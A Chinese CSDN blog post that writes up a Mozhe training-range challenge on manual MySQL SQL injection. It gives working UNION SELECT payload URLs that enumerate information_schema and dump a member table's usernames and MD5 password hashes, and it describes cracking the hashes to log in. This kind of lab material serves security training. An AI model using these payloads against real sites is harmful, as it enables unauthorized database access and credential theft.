SQL手工注入漏洞测试(MySQL数据库)——墨者学院

最新推荐文章于 2024-07-09 07:02:55 发布
最新推荐文章于 2024-07-09 07:02:55 发布
阅读量637 收藏 1
点赞数 1
分类专栏: sql手工注入 文章标签: 网络安全 sql mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44341921/article/details/119355679
版权

在线靶场:https://www.mozhe.cn/bug/detail/elRHc1BCd2VIckQxbjduMG9BVCtkZz09bW96aGUmozhe

进入靶场点击通知

 1.判断注入点

在id后面输入 and 1=1发现页面不变

在id后面输入 and 1=2发现页面内容消失,所以可能存在注入点

2.判断列名数量(使用order by猜解)

依次按顺序输入1,2,3,4,5,当输入到5时,发现内容消失,所以只有列名数量为4

 3.判断显示位

这里使用union联合查询,同时判断2和3位存在显示位 

 4.获取数据库版本和操作系统

数据库版本:version()

操作系统:@@version_compile_os 

 5.获取数据库名和用户

数据库名:database()

用户:user()

 6.获取系统登录账户和密码

information_schema.tables:记录所有表名信息的表

information_schema.columns:记录所有列名信息的表

table_name:表名

table_schema:数据库名

collumn_name:列名

6.1查询数据库mozhe_Discuz_StormGroup下的表名信息:

http://219.153.49.228:42138/new_list.php?id=-1 union select 1,group_concat(table_name ),3,4 from information_schema.tables where table_schema='mozhe_Discuz_StormGroup'

 这里得到两个表

6.2查询表StormGroup_member和notice下的列名信息:

http://219.153.49.228:42138/new_list.php?id=-1 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='StormGroup_member'

http://219.153.49.228:42138/new_list.php?id=-1 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='notice' 

由两张图可知排除表notice,表StormGroup_member存在系统登录用户和密码

6.3通过表StormGroup_member查询用户登录账号和密码

 http://219.153.49.228:42138/new_list.php?id=-1 union select 1,group_concat(name),group_concat(password),4 from StormGroup_member

 

 这里我们得到一个账户有两个用MD5加密过的密码数据,对其解密

最后通过登录发现密码dsan13是被禁用,正确密码为862693,成功登录并拿到key 

巴伯舒特
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
墨者未必黑——思想汇报 .docx
02-10
墨者未必黑——思想汇报 .docx
24.注入篇————Sql server数据库注入
Fly_鹏程万里
03-03 3009
前言攻击者对于数据库注入,无非是想利用数据库获取更多的数据或者更大的权限,那么利用方式可以归纳为以下几种:查询数据读写文件执行命令利用错误消息提取信息Sql server数据库是一个非常优秀的数据库,它可以准确地定位错误消息,对开发人员来说来说,这是一件十分美好的事情,对攻击者来说也是一件十分美好的事情,因为攻击者可以通过错误消息提取数据。(1)枚举当前表及列查询root用户的详细信息,SQL语句...
墨者学院-HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)
05-29
HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)、phpMyAdmin后台文件包含分析溯源、PHP代码分析溯源(第1题)、PHP代码分析溯源(第2题)、PHP逻辑漏洞利用实战(第1题)、SQL手工注入漏洞测试(Access数据库)
WebShell文件上传漏洞分析溯源
02-22
2. 渗透测试:通过渗透测试来检测Web应用程序是否存在文件上传漏洞。 3. 漏洞扫描:使用漏洞扫描工具来检测Web应用程序是否存在文件上传漏洞。 六、WebShell 文件上传漏洞的实践案例 在这个实践案例中,我们使用...
spring IOC实现(墨者革离)
12-12
在这个名为"spring_IOC实现(墨者革离)"的项目中,我们可以通过模拟城门叩问的编剧场景来理解这一概念。 首先,控制反转的基本思想是将对象的创建和依赖关系的管理从应用程序中分离出来,交给一个外部容器(在...
墨者未必黑.pdf
12-26
墨者未必黑.pdf
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8329
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
SQL面试题练习 —— 各用户最长的连续登录天数-可间断
hu_wei123的博客
07-06 298
现要求统计各用户最长的连续登录天数,间断一天也算作连续,例如:一个用户在1,3,5,6登录,则视为连续6天登录。首先根据user_id和group_id分组,用datediff计算出出最大登陆日期和最小登陆日期,两者做差+1 得到每次连续登陆的天数。根据用户分组,使用lag函数获得当前行的上一行数据中的日期,使用datediff函数判断日期当期日期与上一行日期的时间差。根据date_diff结果判断是否连续,如果date_diff <= 2则认为连续 我们给赋值为0,否则不连续,赋值为1。
Linux中的管道符‘|‘以及SQL(DQL,DCL)
2301_77479435的博客
07-07 324
Linux中的管道符'|'以及SQL(DQL,DCL)
My sql 安装,环境搭建
2201_75643669的博客
07-03 713
以下以MySQL 8.0.36为例。
SQL】索引过多的缺点
hui_zai_的博客
07-04 482
索引过多的缺点
PostgreSQL 如何处理海量小文件数据的存储和查询?
技术笔记
07-08 885
处理 PostgreSQL 中的海量小文件数据存储和查询是一个复杂的任务,需要考虑存储方式、查询优化、并发控制和性能调优等多个方面。根据实际的业务需求和数据特点,选择合适的解决方案,并不断进行测试和优化,以确保系统的性能和可靠性。🎉相关推荐🍅关注博主🎗️带你畅游技术世界,不错过每一次成长机会!📚领书:PostgreSQL 入门到精通.pdf📙PostgreSQL 中文手册📘PostgreSQL 技术专栏。
创建数据库表的语法定义包含了SQL Server、Mysql、PostgreSQLSQLite的示例
weixin_49816293的博客
07-03 984
数据库设计中,创建表是基础且关键的一步。本文将详细介绍如何在不同数据库系统中使用数据定义语言(DDL)来定义表结构。
SQL-DQL
qq_59076775的博客
07-03 524
X表示前面有多少位无所谓,最后一位为X。五.DQL-聚合函数将一列数据作为一个整体,进行纵向计算。
怎样优化 PostgreSQL 中对日期时间范围的模糊查询?
最新发布
技术笔记
07-09 582
在 PostgreSQL 中,当处理对日期时间范围的模糊查询时,可能会面临性能挑战。优化此类查询非常重要,以确保数据库能够快速有效地响应请求。在本文中,我们将详细探讨如何优化 PostgreSQL 中对日期时间范围的模糊查询,并提供相关的解决方案和示例。
SQL之delete、truncate和drop区别
2301_81133727的博客
07-07 833
相同点:1、都有删除表的功能;不同点:1、delete、truncate仅仅删除表里面的数据;drop会把表的结构也删除掉2、delete是DML语句,操作完了,还可以回滚;truncate和drop是DDL语句,删除之后立即生效,不能回滚;3、在执行效益上drop>truncate>delete;扩展知识:为了形成数据库语言,DDL和DML都是必须的。DDL和DML之间的主要区别在于:DDL有助于更改数据库的结构,而DML有助于管理数据库中的数据。
NoSQL 之 Redis 配置与常用命令
qq_54188720的博客
07-06 1080
Redis 是 用C语言开发的,开源的,基于内存运行的NoSQL存储结构:键值对(Key/Value KV)数据类型:五大基础数据类型 string(字符串) list(列表) hash(哈希/散列) set(集合/无序集合) zset/sorted set(有序集合)三种特殊的数据类型 :HyperLogLogs(基数统计) Bitmaps(位图) geospatial(地理位置)端口号:TCP/6379MySQL 和 Redist 的配合使用图[Unit]
PostgreSQL 中如何实现数据的增量更新和全量更新的平衡?
技术笔记
07-09 757
数据库管理中,数据的更新操作是常见的任务。对于大型数据集或高并发的系统,选择合适的更新策略至关重要。增量更新和全量更新是两种常见的数据更新方式,如何在 PostgreSQL 中平衡这两种更新方式以确保数据的一致性、性能和可靠性是一个值得深入探讨的问题。
在 PostgreSQL 里如何处理数据的版本跟踪和回滚?
技术笔记
07-08 993
数据库管理中,数据的版本跟踪和回滚是非常重要的功能,有助于在数据操作出现错误或需要回滚到特定状态时进行有效的处理。PostgreSQL 提供了几种方法来实现数据的版本跟踪和回滚,包括事务、保存点、版本控制扩展等。
墨者-sql手工注入漏洞测试
04-29
墨者安全团队是一支专注于网络安全领域的团队,他们致力于网络安全研究...总的来说,墨者安全团队的手工注入漏洞测试方法比较系统和全面,可以有效地发现目标网站中存在的注入漏洞,从而帮助企业提高网络安全防护水平。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值